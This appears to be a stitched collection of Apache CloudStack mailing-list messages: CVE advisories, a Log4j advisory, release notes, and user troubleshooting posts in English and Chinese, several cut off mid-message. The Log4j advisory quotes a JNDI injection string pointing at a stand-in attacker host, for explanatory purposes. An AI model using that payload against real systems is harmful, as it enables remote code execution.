Apache CloudStack security releases 4.18.1.1 and 4.19.0.1 address the
CVEs listed below. Affected users are recommended to upgrade their
CloudStack installations.

1. CVE-2024-29006: x-forwarded-for HTTP header parsed by default

Severity: moderate

Description:

By default the CloudStack management server honours the
x-forwarded-for HTTP header and logs it as the source IP of an API
request. This could lead to authentication bypass and other
operational problems should an attacker decide to spoof their IP
address this way.

Affected versions: Apache CloudStack 4.11.0.0 through 4.18.1.0, and 4.19.0.0

2. CVE-2024-29007: When downloading templates or ISOs, the management
server and SSVM follow HTTP redirects with potentially dangerous
consequences

Severity: moderate

Affected versions: Apache CloudStack 4.9.1.0 through 4.18.1.0, and 4.19.0.0

Description:

The CloudStack management server and secondary storage VM could be
tricked into making requests to restricted or random resources by
means of following 301 HTTP redirects presented by external servers
when downloading templates or ISOs. Users are recommended to upgrade
to version 4.18.1.1 or 4.19.0.1, which fixes this issue.

3. CVE-2024-29008: The extraconfig feature can be abused to load
hypervisor resources on a VM instance

Severity: critical

Affected versions: Apache CloudStack 4.14.0.0 through 4.18.1.0, and 4.19.0.0

Description:

A problem has been identified in the CloudStack additional VM
configuration (extraconfig) feature which can be misused by anyone who
has privilege to deploy a VM instance or configure settings of an
already deployed VM instance, to configure additional VM configuration
even when the feature is not explicitly enabled by the administrator.
In a KVM based CloudStack environment, an attacker can exploit this
issue to attach host devices such as storage disks, and PCI and USB
devices such as network adapters and GPUs, in a regular VM instance
that can be further exploited to gain access to the underlying network
and storage infrastructure resources, and access any VM instance disks
on the local storage.

[ADVISORY] CloudStack Advisory on Apache Log4j Zero Day (CVE-2021-44228)

On 9th December 2021, a new zero-day vulnerability for Apache Log4j
was reported. It is by now tracked under CVE-2021-44228:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228.

CVE-2021-44228 vulnerability is classified under the highest severity
mark and allows an attacker to execute arbitrary code by injecting a
sub-string in the form "${jndi:ldap://some.attacker-controlled.site/};
into a logged message. Apache Log4j 2.x is reported to be affected as
it performs a lookup (string substitution) using the JNDI protocol,
whenever the "${jndi:...}" string is found within a message parameter.

The Apache Log4j developers [1] and the SLF4J project [2] advisory
confirm that Apache Log4j 1.x does not offer a look-up mechanism and
does not suffer remote code execution (RCE) vulnerability from
CVE-2021-44228.

All Apache CloudStack releases since v4.6 use Apache Log4j version
1.2.17 and therefore are not affected by this RCE vulnerability. Most
users who haven't changed the default log4j xml config don't need to
do anything, advanced users can check and fix their log4j xml
configuration if they're using any custom JMS appenders.

The Apache CloudStack project will consider migrating to a different
version of Apache Log4j in future releases.

Problem with Templates/ISOs

Hello there,

I am a new CloutStack user and a new user on this mailing list. After
following the Quick Installation Guide, I ended up with empty Template/ISOs
when I attempted to create a VM instance.

If I go to Images/Templates, I got 500 Internal Server Error:

Could someone help me fix this issue?

The quick installation guide I followed says it is for 4.15.2.0
installation. However, in the System Template Setup section, this command:

I'd like to announce a feature code for CloudStack and CloudStack Primate.

We'll go through a period testing  (and only bug fix merges) to get us to
an RC state for both. Then vote on both at the same time (more or less).



Could I ask everyone to have a look at open PRs and issues and help out
with reviews and fixes.



The new UI (Primate) goes GA with this release.  It was a huge endeavour,
so the odd niggle is to be expected,  so please remember to conduct your
manual testing using the new UI and report any bugs.

我尝试手工的方式使用UUID 把Secodary 挂载在vCenter Cluster中，启动资源域后也同样在没有任何响应, 
ACS日志里报错：“received secondary storage vm alert/Secondary Storage Vm creation 
failure, zone:..", 完整的ACS日志在附件里。
我有成功管理ACS+KVM的经验，以及使用ACS4.3+vSphere5.5的经验。但目前的问题确实把我难到了，希望能获得大家的指导，谢谢！

This problem has been plaguing me for two weeks and I am looking for help. I 
have tried and failed to manage Vsphere6.5/6.7 using ACS4.11.3.
The specific phenomenon is that SSVM and CPVM cannot be started after the 
resource domain is turned on. Meanwhile, there is no operation to mount 
Secondary and copy SYSVM in vCenter.
I tried to mount Secodary in vCenter Cluster by using UUID manually. After 
starting the resource domain, there was no response. The ACS log reported an 
error: "Received Secondary Storage VM Alert /Secondary Storage VM Creation 
Failure, zone:..", the complete ACS log is attached.
I have experience successfully managing ACS+KVM and using ACS4.3+vSphere5.5.But 
the current problem does make me difficult, I hope to get your guidance, thank 
you!

This level of HA lays beyond the scope of ACS. I advise you to explore GLB that 
runs outside of ACS that will direct traffic to the available VMs across 
regions. Alternatively if you physical network architecture can provide the 
same L2 segments across regions you can explore keepalived VRRP feature to move 
the same IP across the set of VMs in different regions. Those floating IPs will 
need to be managed outside of ACS.

Actually this is a discussion thread, once any issues which people may raise 
are ironed out I expect Rohit will start a VOTE on a concrete proposal and 
timeline.

I think the time frame proposed to sunset the old UI is doable and we'll

One of our challenges over the last few years is the added work of getting 
UI features into the release and it has added around 30% additional work load 
due to the older style code of the current UI. Having it in VUE is great and I 
think it will also encourage others to contribute.

[MESSAGE] Self-Introductory Message

Hi Everyone,



Well it is official now, for the next year I'll be the Chairman/VP of the
Apache CloudStack Project.  To dive straight into the clichés; for me it is
an honour and a privilege to hold this position.



There are so many awesome people doing awesome things in this CloudStack
community. And there are also many people that I meet that, although can’t
say so due to their company policies, genuinely appreciate what everyone
does.



I have no big technical agenda that I wish to push during my tenure. I
would just like to try to bottle the sense of camaraderie and family that I
feel whenever I'm at a CloudStack Collaboration Conference and bring that
to the community as a whole; throughout the year.



I would like to try to bring closer together the 'users' and the
'developers' in the community.  I think that the 'developers' can benefit
from users' insights but also experience the positivity and excitement that
new helpful features generate, and 'users' can benefit from seeing how
tricky trying to develop features in a constantly shifting landscape is.



I will also try to encourage organisations which use CloudStack but don't
talk about it to get out and do so, I see it as an easy way for them to
protect their investment in CloudStack as its a virtual circle that will
lead to more organisations following suit, which in turn will bring even
more interest and participation in the project.



And finally... if nothing else, please excuse the use of English spelling.

1. 先保证GUI能运行
2. 到user那里generate key，得到apikey 和secretkey
3. cloudstack api在这里。http://cloudstack.apache.org/api.html
4. 把包括地址，端口，参数的url创建好了之后就是签名，每个语言大概都能找到大概的实现。
http://docs.cloudstack.apache.org/en/latest/dev.html

最关键的就是签名了，这个没问题了之后，调用什么api就要看自己的使用经验了。

如果不想搞这个签名，那就用cloudmonkey吧，命令行形式，用什么脚本语言都可以调用。

主存储和二级存储的大小没什么关系，且两者存的东西不一样。主存储主要是用于VM实例，二级存储用于存储模板和系统镜像。
大小与指定的NFS/SWIFT的空间大小一致。

既然这样，那就用NFS好了，
CS的[secondary storage] 使用NFS的时间比较长，稳定。 对整体VM的运行也没有什么影响。

对性能影响主要的还是Primary Storage和带宽/磁盘IO。

Our environment: CentOS7.4, CloudStack4.11.1.0 + KVM + RBD(Primary) +
Swift(Secondary) + NFS Secondary_Staging_Storege;
 
Failure: after adding the resources and starting Zone, SSVM and CPVM cannot
be started, and corresponding template virtual machine cannot be created.
Replace Secondary with NFS type to start SSVM and CPVM.
 
The system logs are as follows

About ACS4.11.1 using Swift to do Secondary(关于ACS4.11.1使用Swift做Secondary的问题；)

hello everybody!

Our environment: CentOS7.4, CloudStack4.11.1.0 + KVM + RBD(Primary) +
Swift(Secondary) + NFS Secondary_Staging_Storege;

Failure: after adding the resources and starting Zone, SSVM and CPVM cannot
be started, and corresponding template virtual machine cannot be created.
Replace Secondary with NFS type to start SSVM and CPVM.

The system logs are as follows

Question About VPN Client-to-Site, Client Getting 0.0.0.0 Route

Hi Friends,

As official documentation is informed

"Make sure that not all traffic goes through the VPN. That is, the route
installed by the VPN should be only for the guest network and not for all
traffic."

It is occurring that the VPN Client receives a default route to the VPN
Gateway (As Attached), so all traffic is routed to VPN and the Client is
left without Internet access.

Should Apache CloudStack VR not only announce your Network?
